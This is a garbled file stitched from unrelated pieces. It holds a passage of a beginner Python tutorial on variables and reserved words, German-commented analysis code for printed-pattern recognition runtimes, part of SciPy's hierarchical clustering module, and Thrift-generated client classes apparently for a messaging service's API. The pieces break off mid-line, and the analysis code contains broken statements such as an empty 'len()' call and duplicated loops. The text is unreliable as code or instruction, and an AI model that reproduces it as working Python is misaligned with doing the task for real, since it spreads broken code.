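# the right-hand side is evaluated first (2 + 1), then the result is assigned to x
x = x + 1

print(x)    # prints 3
```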
### Reminders

- In programming, `=` means assignment
- Anything to the right of the `=` is evaluated before assignment
- Names are always on the left of the `=`, values are always on the right

## Naming Variables

So far, we've only defined a few variables, and we haven't yet specified the *rules* for variable assignment. There are a whole bunch of options for how you name your variables and only a few rules. The rules are:

1. Names are case sensitive
2. Variables must start with letters
    - After that, they can include numbers and underscores
    - They cannot include special characters (like &, *, #, etc)
3. Python doesn't care what you name your variables
    - Humans do care. Pick names that describe the data / value that they store

### Names are case-sensitive

In programming, capitalization matters *a lot*. `VAR_1` and `var_1` are interpreted as two *different* variables when it comes to code. Be mindful of capitalization. Capital and lower-case letters are interpreted by the computer as two different characters.

### Variables must start with letters

We saw that variables can contain numbers and underscores when we created `var_1` earlier. While they can *contain* numbers, they cannot *begin* with one, so `1_var` would not be an acceptable variable name. If you try to create a variable whose name starts with a number, Python will give you a `SyntaxError`. (Names that begin with an underscore, like `_var1`, are technically allowed, but leading underscores carry special meaning by convention, so it's best to start your variable names with a letter.)

Additionally, Python does not allow variable names to contain a few special characters (ie. &, \*, #, etc). If you try to create a variable with a special character in its name, Python will also give you a `SyntaxError`. Thus, it's best to limit variable names to letters, underscores, and numbers.

### Python doesn't care what you name your variables

Python doesn't care whether your variable name is `a` or `heights`; however, humans do. So, pick variable names that are informative about the information stored within the variable. For example, `a` doesn't clue the human reader of the code into what information is stored in the variable. However, `heights` lets the person reading the code (which could be you in the future or someone else) know what information the variable stores.
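For example, because names are case sensitive, the two assignments below create two *different* variables, and only names that follow the rules above will work:

```python
# case matters: these are two different variables
var_1 = 6
VAR_1 = 60

# a descriptive name tells the reader what the value means
height_in_cm = 170

# this line would raise a SyntaxError, because names cannot start with a number
# 1_var = 6
```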
## Reserved Words

Beyond those three rules, here are 33 words that are not allowed to be used for variable assignment in Python. These are words that have a particular meaning in Python and thus you're not allowed to use them for variable assignment. If you try to define a variable with one of these names, you'll get a `SyntaxError`.

<table>
<tr>
<td><code>False</code></td>
<td><code>None</code></td>
<td><code>True</code></td>
<td><code>and</code></td>
<td><code>as</code></td>
<td><code>assert</code></td>
<td><code>break</code></td>
</tr>
<tr>
<td><code>class</code></td>
<td><code>continue</code></td>
<td><code>def</code></td>
<td><code>del</code></td>
<td><code>elif</code></td>
<td><code>else</code></td>
<td><code>except</code></td>
</tr>
<tr>
<td><code>finally</code></td>
<td><code>for</code></td>
<td><code>from</code></td>
<td><code>global</code></td>
<td><code>if</code></td>
<td><code>import</code></td>
<td><code>in</code></td>
</tr>
<tr>
<td><code>is</code></td>
<td><code>lambda</code></td>
<td><code>nonlocal</code></td>
<td><code>not</code></td>
<td><code>or</code></td>
<td><code>pass</code></td>
<td><code>raise</code></td>
</tr>
<tr>
<td><code>return</code></td>
<td><code>try</code></td>
<td><code>while</code></td>
<td><code>with</code></td>
<td><code>yield</code></td>
</tr>
</table>

# you will get an error if you try to assign a variable to one of these words
try = 6

## How Code Executes

So far we've been writing and executing code within a Jupyter notebook. But, what does that mean? What is the notebook and how does it know that I want to execute code?

### Kernel

<div class="alert alert-success">
The <b>kernel</b> is the thing that executes your code. It is what connects the notebook (as you see it) with the part of your computer that runs code.
</div>

Your kernel also stores your **namespace** - all the variables and code that you have declared (executed). It can be useful to clear and re-launch the kernel. You can do this from the 'kernel' drop-down menu, at the top of your Jupyter notebook, optionally also clearing all outputs. Note that this will erase any variables that are stored in memory.

### Namespace

<div class="alert alert-success">
The <b>namespace</b> is the 'place' where all your currently defined code is declared - all the things you have stored in active memory.
</div>

For example, when code is typed, nothing happens and the variable does *not* exist *until* the code is executed. Once executed, the variable is stored in memory within your **namespace**.

# once you create a variable it's stored in your namespace
my_variable = 6

Within a Jupyter notebook, you can always use the `%whos` magic command to get information about what variables have been defined in your current namespace. For example, here, you'll see all the variables currently in our namespace. In other
["r", "s", "m", "n", "page_size", "page_margin", "cam_reso", "cap_area", "m5_size", "printer", "dpi", "num_win", "ia_id", "true_pos", "true_x", "true_y", "true_pos_dist", "index", "dbt_positions", "dbt_pos", "dbt_x", "dbt_y", "real_positions", "real_pos", "real_x", "real_y", "matching_indices", "matches", "matches_len", "error_margin", "err_margin_match", "error_radius", "err_radius_match", "runtime", "runtime_mean"] # Merge additions with main data frame (gobble up the old junk :D) sm = sm.merge(merge_df, left_index=True, right_on="ia_id")[columns] # Save to file (if filename given) if submatrix_fname is not None: sm.to_csv(submatrix_fname, index=False) # TODO: Make it create (if not present) or read (if present) and return sm return sm, raw def filter_data(): # ~6s runtime sm, raw = create_submatrix_csv() # # Performance timer # start_time = time.perf_counter() # total_time = time.perf_counter() - start_time # print(f"THIS took {total_time:.3f}s") # Drop 100 dpi values (no image analysis possible) # raw = raw.dropna() # Calculate overall_runtime_mean (Gesamtdurchschnittswert der Laufzeit) overall_runtime_mean = raw.runtime.sum() / raw.num_win.sum() print("Overall runtime mean for single submatrix (in s):") print(overall_runtime_mean) # Ist NICHT aussagekräftig weil wir die Analyse grundsätzlich beschränken # können wie wir wollen # print(raw.runtime.sum() / len(raw)) print("dpi specific runtime mean (in s):") for dpi in raw.dpi.unique(): dpi_df = raw[raw.dpi == dpi] # print("mean for single call / image analysis: ", end="") # per img analysis # print(dpi, dpi_df.runtime.sum() / len(dpi_df)) # print("mean for single submatrix: ", end="") # per submatrix print(dpi, dpi_df.runtime.sum() / dpi_df.num_win.sum()) # Filter for "good" and "bad" results # good_margin = sm[sm.err_margin_match] # bad_margin = sm[~sm.err_margin_match] good_radius = sm[sm.err_radius_match] bad_radius = sm[~sm.err_radius_match] # # Calculate margin means (Gesamtdurchschnittswert der guten/schlechten # # Ergebnisse mit Quadratauswahl) # print("Overall good results mean (margin):") # print(len(good_margin)) # count # good_margin_mean = len(good_margin) / len(sm) # mean # print(good_margin_mean) # mean # print("Overall bad results mean (margin):") # print(len(bad_margin)) # count # bad_margin_mean = len(bad_margin) / len(sm) # mean # print(bad_margin_mean) # mean # Calculate radius means (Gesamtdurchschnittswert der guten/schlechten # Ergebnisse mit Radiusauswahl) print("Overall good results mean (radius):") print(len(good_radius)) # count good_radius_mean = len(good_radius) / len(sm) # mean print(good_radius_mean) # mean # print("Overall bad results mean (radius):") # print(len(bad_radius), len(sm)) # count # bad_radius_mean = len(bad_radius) / len(sm) # mean # print(bad_radius_mean) # mean probs = {"printer": [], "dpi": [], "prob": []} # Calculate good result means for every dpi print(f"Mean for every dpi (radius)") for p_label in ["both"] + sm.printer.unique().tolist(): # filter for printer if p_label == "both": sm_p = sm good_radius_p = good_radius else: sm_p = sm[sm.printer == p_label] good_radius_p = good_radius[good_radius.printer == p_label] for dpi in sm_p.dpi.unique(): # print(f"Mean for {dpi} dpi (margin)") # good_margin_dpi = good_margin[good_margin.dpi == dpi] # print(len(good_margin_dpi), len(sm_dpi)) # count # print(len(good_margin_dpi)/len(sm_dpi)) # mean # filter for dpi sm_dpi = sm_p[sm_p.dpi == dpi] good_radius_dpi = good_radius_p[good_radius_p.dpi == dpi] # save prob probs["dpi"].append(dpi) prob = 
len(good_radius_dpi) / len(sm_dpi) probs["prob"].append(prob) probs["printer"].append(p_label) # print(dpi, len(good_radius_dpi), len(sm_dpi)) # count # print(len(good_radius_dpi) / len(sm_dpi)) # mean # Create probability data frame probs = pd.DataFrame(probs) print(probs) print(probs.to_latex()) # Values for diagrams dpis = raw.dpi.unique() # Prepend 100 dpi values dpis = [(100, 100)] + dpis.tolist() dpis_xs = [x for x, y in dpis] num_wins = raw.num_win.unique() num_wins = [0] + num_wins.tolist() num_win_sums = [] for dpi in raw.dpi.unique(): num_win_sums.append(raw[raw.dpi == dpi].num_win.sum()) num_win_sums = [0] + num_win_sums # TODO Do NOT use variables just use plt to continously draw a figure and # then save it with savefig("fname") (there are also LaTeX-friendly # postscript formates to export to) plt.plot(dpis_xs, num_win_sums, "--") plt.scatter(dpis_xs, num_win_sums, marker="^") plt.xlabel("Musterauflösungen (in dpi)") plt.ylabel("Anzahl Submatrizen (insgesamt)") plt.savefig("fig_dpis_num_win_sums.pdf") plt.close() plt.plot(dpis_xs, num_wins, "--") plt.scatter(dpis_xs, num_wins, marker="^") plt.xlabel("Musterauflösungen (in dpi)") plt.ylabel("Anzahl Submatrizen") plt.savefig("fig_dpis_num_wins.pdf") return # runtime_mean_complete = raw.runtime. # Probability for every dpi and split into printers # Create dictionary for creation of probability data frame probs = {"printer": [], "dpi": [], "dpi_x": [], "dpi_y": [], "nrows_margin": [], "prob_margin": [], "nrows_radius": [], "prob_radius": []} # EIN gutes ergb das mit dem bro dru gedruckt wurde und die dpi von 150 hat # p_lables = sm.printer.unique() # Iterate over printer labels (include both -> not filter) printer_labels = ["both"] + sm.printer.unique() for p_label in printer_labels: # Select printers (filter them) if p_label != "both": p_margin = good_margin[good_margin.printer == p_label] p_radius = good_radius[good_radius.printer == p_label] p_sm = sm[sm.printer == p_label] else: p_filt_margin = good_margin p_filt_radius = good_radius p_sm = sm # Iterate over dpis for dpi in sm.dpi.unique(): dpi_x, dpi_y = dpi # filter dpis # zahl der guten # Iterate over dpis for dpi in sm.dpi.unique(): dpi_x, dpi_y = dpi # Iterate over printer labels (include both -> not filter) printer_labels = ["both"] + sm.printer.unique() for p_label in printer_labels: # TODO split in good and bad? But those are complementary so it # doesn't mather too much as long as one of those is shown. 
if p_label != "both": # Filter for printer p_filt_margin = good_margin[good_margin.printer == p_label] p_filt_radius = good_radius[good_radius.printer == p_label] nrows_good_margin = len(good_margin) nrows_good_radius = len(good_radius) nrows = len(sm) else: nrows_margin = len() p_filter = good_margin[good_margin.printer == p_label] nrows_margin = len(good_margin[p_filter]) p_filter = good_radius[good_radius.printer == p_label] nrows_radius = len(good_radius[p_filter]) nrows() # nrows = len(p[(p.dpi == dpi)]) nrows = len(sm) prob_margin = nrows_good_margin / nrows # Fill dictionary with values probs["printer"].append(p_label) probs["dpi"].append(dpi) probs["dpi_x"].append(dpi_x) probs["dpi_y"].append(dpi_y) probs["nrows_margin"].append(nrows_margin) probs["prob_margin"].append(prob_margin) probs["nrows_radius"].append(nrows_radius) probs["prob_radius"].append(prob_radius) # Create probability data frame probs = pd.DataFrame(probs) print(probs) def create_plots(fname="raw.csv", submatrix_fname="submatrix.csv"): # ~6s runtime sm, raw = create_submatrix_csv() # Performance timer start_time = time.perf_counter() total_time = time.perf_counter() - start_time print(f"THIS took {total_time:.3f}s") # # Import raw csv # raw = pd.read_csv(fname) # transform_funcs = {"r": int, # "s": int, # "m": int, # "n": int, # "page_size": literal_eval, # "page_margin": literal_eval, # "cam_reso": literal_eval, # "cap_area": literal_eval, # "m5_size": literal_eval, # "printer": str, # "dpi": literal_eval, # "num_win": int, # "true_pos": literal_eval, # "dbt_positions": literal_eval, # "real_positions": literal_eval, # "matching_indices": literal_eval, # "runtime": float} # raw = raw.dropna().transform(transform_funcs) # # Import submatrix csv # submatrix = pd.read_csv(submatrix_fname) # transform_funcs = {"r": int, # "s": int, # "m": int, # "n": int, # "page_size": literal_eval, # "page_margin": literal_eval, # "cam_reso": literal_eval, # "cap_area": literal_eval, # "m5_size": literal_eval, # "printer": str, # "dpi": literal_eval, # "num_win": int, # "ia_id": int, # "true_pos": literal_eval, # "true_x": float, # "true_y": float, # "true_pos_dist": float, # "index": int, # "dbt_positions": literal_eval, # "dbt_pos": literal_eval, # "dbt_x": int, # "dbt_y": int, # "real_positions": literal_eval, # "real_pos": literal_eval, # "real_x": float, # "real_y": float, # "matching_indices": literal_eval, # "matches": literal_eval, # "matches_len": float, # "error_margin": int, # "err_margin_match": bool, # "error_radius": int, # "err_radius_match": bool, # "runtime": float, # "runtime_mean": float} # submatrix = submatrix.transform(transform_funcs) df = sm # probability "correct"/expected position of every printer and dpi (w/o # 100) probs = {"printer": [], "dpi": [], "prob": []} for p_label in df.printer.unique(): p = df[df.printer == p_label] for dpi in p.dpi.unique(): nrows_exp = len(p[(p.dpi == dpi) & p.err_margin_match]) nrows = len(p[(p.dpi == dpi)]) prob = nrows_exp / nrows probs["printer"].append(p_label) probs["dpi"].append(dpi) probs["prob"].append(prob) probs = pd.DataFrame(probs) print(probs) # Maybe create a plot with the probability on the y axis and the dpi from # 100 to 400 on the x axis ideal_pos = {"x": [], "y": []} for p in df["true_pos"].unique(): ideal_pos["x"].append(p[0]) ideal_pos["y"].append(p[1]) ideal_pos = pd.DataFrame(ideal_pos) plt.scatter(ideal_pos["x"], ideal_pos["y"]).get_figure().show() # Maybe try to "connect" ideal positions with measured x and y values. 
# df[(df.dpi == (125, 125)) & (df.printer == "LexmarkMS510dn") & # df.err_margin_match] for p_label in ["LexmarkMS510dn"]: # df.printer.unique(): p = df[df.printer == p_label] for dpi in [(125, 125)]: # p.dpi.unique(): f = p[(p.dpi == dpi) & p.err_margin_match] f_inv = p[(p.dpi == dpi) & p.err_margin_match.apply(lambda x: not x)] plt.scatter(f_inv["x"], f_inv["y"]).get_figure().show() plt.scatter(f["x"], f["y"]).get_figure().show() # Draw scatter plots over each other # All X and Y positions # plt.scatter(df_pos["x"], df_pos["y"]).get_figure().show() # Only "correct" positions # filtered_inv = df_pos[df_pos["err_margin_match"].apply(lambda x: not x)] # filtered = df_pos[df_pos["err_margin_match"]] # plt.scatter(filtered_inv["x"], filtered_inv["y"]).get_figure().show() # plt.scatter(filtered["x"], filtered["y"]).get_figure().show() # print(df_pos[df_pos["err_margin_match"]]) # print(df_pos[df_pos["err_margin_match"] & # df_pos["matches"].apply(lambda x: x != [])]) # print(df_pos[(df_pos["index"] == 0) & (df_pos["ia_id"] == 1799)]) # print(df_pos[pd.notna(df_pos["matches"]) & #
name='Z') y = _convert_to_double(np.asarray(y, order='c')) if y.ndim == 1: distance.is_valid_y(y, throw=True, name='y') [y] = _copy_arrays_if_base_present([y]) elif y.ndim == 2: if y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0): if np.all(y >= 0) and np.allclose(y, y.T): _warning('The symmetric non-negative hollow observation ' 'matrix looks suspiciously like an uncondensed ' 'distance matrix') y = distance.pdist(y, metric) else: raise ValueError("`y` must be 1 or 2 dimensional.") if not np.all(np.isfinite(y)): raise ValueError("The condensed distance matrix must contain only " "finite values.") return _optimal_leaf_ordering.optimal_leaf_ordering(Z, y) def _convert_to_bool(X): if X.dtype != bool: X = X.astype(bool) if not X.flags.contiguous: X = X.copy() return X def _convert_to_double(X): if X.dtype != np.double: X = X.astype(np.double) if not X.flags.contiguous: X = X.copy() return X def cophenet(Z, Y=None): """ Calculate the cophenetic distances between each observation in the hierarchical clustering defined by the linkage ``Z``. Suppose ``p`` and ``q`` are original observations in disjoint clusters ``s`` and ``t``, respectively and ``s`` and ``t`` are joined by a direct parent cluster ``u``. The cophenetic distance between observations ``i`` and ``j`` is simply the distance between clusters ``s`` and ``t``. Parameters ---------- Z : ndarray The hierarchical clustering encoded as an array (see `linkage` function). Y : ndarray (optional) Calculates the cophenetic correlation coefficient ``c`` of a hierarchical clustering defined by the linkage matrix `Z` of a set of :math:`n` observations in :math:`m` dimensions. `Y` is the condensed distance matrix from which `Z` was generated. Returns ------- c : ndarray The cophentic correlation distance (if ``Y`` is passed). d : ndarray The cophenetic distance matrix in condensed form. The :math:`ij` th entry is the cophenetic distance between original observations :math:`i` and :math:`j`. See Also -------- linkage : for a description of what a linkage matrix is. scipy.spatial.distance.squareform : transforming condensed matrices into square ones. Examples -------- >>> from scipy.cluster.hierarchy import single, cophenet >>> from scipy.spatial.distance import pdist, squareform Given a dataset ``X`` and a linkage matrix ``Z``, the cophenetic distance between two points of ``X`` is the distance between the largest two distinct clusters that each of the points: >>> X = [[0, 0], [0, 1], [1, 0], ... [0, 4], [0, 3], [1, 4], ... [4, 0], [3, 0], [4, 1], ... [4, 4], [3, 4], [4, 3]] ``X`` corresponds to this dataset :: x x x x x x x x x x x x >>> Z = single(pdist(X)) >>> Z array([[ 0., 1., 1., 2.], [ 2., 12., 1., 3.], [ 3., 4., 1., 2.], [ 5., 14., 1., 3.], [ 6., 7., 1., 2.], [ 8., 16., 1., 3.], [ 9., 10., 1., 2.], [11., 18., 1., 3.], [13., 15., 2., 6.], [17., 20., 2., 9.], [19., 21., 2., 12.]]) >>> cophenet(Z) array([1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2., 2., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 2., 2., 2., 1., 2., 2., 2., 2., 2., 2., 1., 1., 1.]) The output of the `scipy.cluster.hierarchy.cophenet` method is represented in condensed form. 
We can use `scipy.spatial.distance.squareform` to see the output as a regular matrix (where each element ``ij`` denotes the cophenetic distance between each ``i``, ``j`` pair of points in ``X``): >>> squareform(cophenet(Z)) array([[0., 1., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [1., 0., 1., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [1., 1., 0., 2., 2., 2., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 0., 1., 1., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 1., 0., 1., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 1., 1., 0., 2., 2., 2., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 0., 1., 1., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 1., 0., 1., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 1., 1., 0., 2., 2., 2.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 0., 1., 1.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 0., 1.], [2., 2., 2., 2., 2., 2., 2., 2., 2., 1., 1., 0.]]) In this example, the cophenetic distance between points on ``X`` that are very close (i.e., in the same corner) is 1. For other pairs of points is 2, because the points will be located in clusters at different corners - thus, the distance between these clusters will be larger. """ Z = np.asarray(Z, order='c') is_valid_linkage(Z, throw=True, name='Z') Zs = Z.shape n = Zs[0] + 1 zz = np.zeros((n * (n-1)) // 2, dtype=np.double) # Since the C code does not support striding using strides. # The dimensions are used instead. Z = _convert_to_double(Z) _hierarchy.cophenetic_distances(Z, zz, int(n)) if Y is None: return zz Y = np.asarray(Y, order='c') distance.is_valid_y(Y, throw=True, name='Y') z = zz.mean() y = Y.mean() Yy = Y - y Zz = zz - z numerator = (Yy * Zz) denomA = Yy**2 denomB = Zz**2 c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum())) return (c, zz) def inconsistent(Z, d=2): r""" Calculate inconsistency statistics on a linkage matrix. Parameters ---------- Z : ndarray The :math:`(n-1)` by 4 matrix encoding the linkage (hierarchical clustering). See `linkage` documentation for more information on its form. d : int, optional The number of links up to `d` levels below each non-singleton cluster. Returns ------- R : ndarray A :math:`(n-1)` by 4 matrix where the ``i``'th row contains the link statistics for the non-singleton cluster ``i``. The link statistics are computed over the link heights for links :math:`d` levels below the cluster ``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard deviation of the link heights, respectively; ``R[i,2]`` is the number of links included in the calculation; and ``R[i,3]`` is the inconsistency coefficient, .. math:: \frac{\mathtt{Z[i,2]} - \mathtt{R[i,0]}} {R[i,1]} Notes ----- This function behaves similarly to the MATLAB(TM) ``inconsistent`` function. Examples -------- >>> from scipy.cluster.hierarchy import inconsistent, linkage >>> from matplotlib import pyplot as plt >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]] >>> Z = linkage(X, 'ward') >>> print(Z) [[ 5. 6. 0. 2. ] [ 2. 7. 0. 2. ] [ 0. 4. 1. 2. ] [ 1. 8. 1.15470054 3. ] [ 9. 10. 2.12132034 4. ] [ 3. 12. 4.11096096 5. ] [11. 13. 14.07183949 8. ]] >>> inconsistent(Z) array([[ 0. , 0. , 1. , 0. ], [ 0. , 0. , 1. , 0. ], [ 1. , 0. , 1. , 0. ], [ 0.57735027, 0.81649658, 2. , 0.70710678], [ 1.04044011, 1.06123822, 3. , 1.01850858], [ 3.11614065, 1.40688837, 2. , 0.70710678], [ 6.44583366, 6.76770586, 3. 
, 1.12682288]]) """ Z = np.asarray(Z, order='c') Zs = Z.shape is_valid_linkage(Z, throw=True, name='Z') if (not d == np.floor(d)) or d < 0: raise ValueError('The second argument d must be a nonnegative ' 'integer value.') # Since the C code does not support striding using strides. # The dimensions are used instead. [Z] = _copy_arrays_if_base_present([Z]) n = Zs[0] + 1 R = np.zeros((n - 1, 4), dtype=np.double) _hierarchy.inconsistent(Z, R, int(n), int(d)) return R def from_mlab_linkage(Z): """ Convert a linkage matrix generated by MATLAB(TM) to a new linkage matrix compatible with this module. The conversion does two things: * the indices are converted from ``1..N`` to ``0..(N-1)`` form, and * a fourth column ``Z[:,3]`` is added where ``Z[i,3]`` represents the number of original observations (leaves) in the non-singleton cluster ``i``. This function is useful when loading in linkages from legacy data files generated by MATLAB. Parameters ---------- Z : ndarray A linkage matrix generated by MATLAB(TM). Returns ------- ZS : ndarray A linkage matrix compatible with ``scipy.cluster.hierarchy``. See Also -------- linkage : for a description of what a linkage matrix is.
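Examples
--------
A small, illustrative conversion; the linkage values below are chosen only
for demonstration (four observations, so three merge rows with 1-based
MATLAB-style indices and no count column):

>>> import numpy as np
>>> from scipy.cluster.hierarchy import from_mlab_linkage
>>> mZ = np.array([[1., 2., 1.],
...                [3., 4., 1.],
...                [5., 6., 2.]])
>>> Z = from_mlab_linkage(mZ)  # indices become 0-based; a count column is appended
>>> Z.shape
(3, 4)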
__ne__(self, other): return not (self == other) class getAllContactIdsForChannel_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1068) = iprot.readListBegin() for _ in range(elem1068): elem1069 = iprot.readString() self.success.append(elem1069) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getAllContactIdsForChannel_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRING, len(self.success)) for elem1070 in self.success: oprot.writeString(elem1070) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class displayBuddySubscriberCount_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('displayBuddySubscriberCount_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class displayBuddySubscriberCount_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.I64: self.success = iprot.readI64() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('displayBuddySubscriberCount_result') if self.success is not None: oprot.writeFieldBegin('success', TType.I64, 0) oprot.writeI64(self.success) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ 
hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getProfileForChannel_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getProfileForChannel_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getProfileForChannel_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = Profile() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getProfileForChannel_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTickets_args(object): """ Attributes: - userMids """ def __init__(self, userMids=None): self.userMids = userMids def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.LIST: self.userMids = [] (_, elem1071) = iprot.readListBegin() for _ in range(elem1071): elem1072 = iprot.readString() self.userMids.append(elem1072) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getUserTickets_args') if self.userMids is not None: oprot.writeFieldBegin('userMids', TType.LIST, 1) oprot.writeListBegin(TType.STRING, len(self.userMids)) for elem1073 in self.userMids: oprot.writeString(elem1073) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def 
validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.userMids)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTickets_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1074) = iprot.readListBegin() for _ in range(elem1074): elem1075 = UserTicketResponse() elem1075.read(iprot) self.success.append(elem1075) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('getUserTickets_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRUCT, len(self.success)) for elem1076 in self.success: elem1076.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getOAFriendMids_args(object): def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, 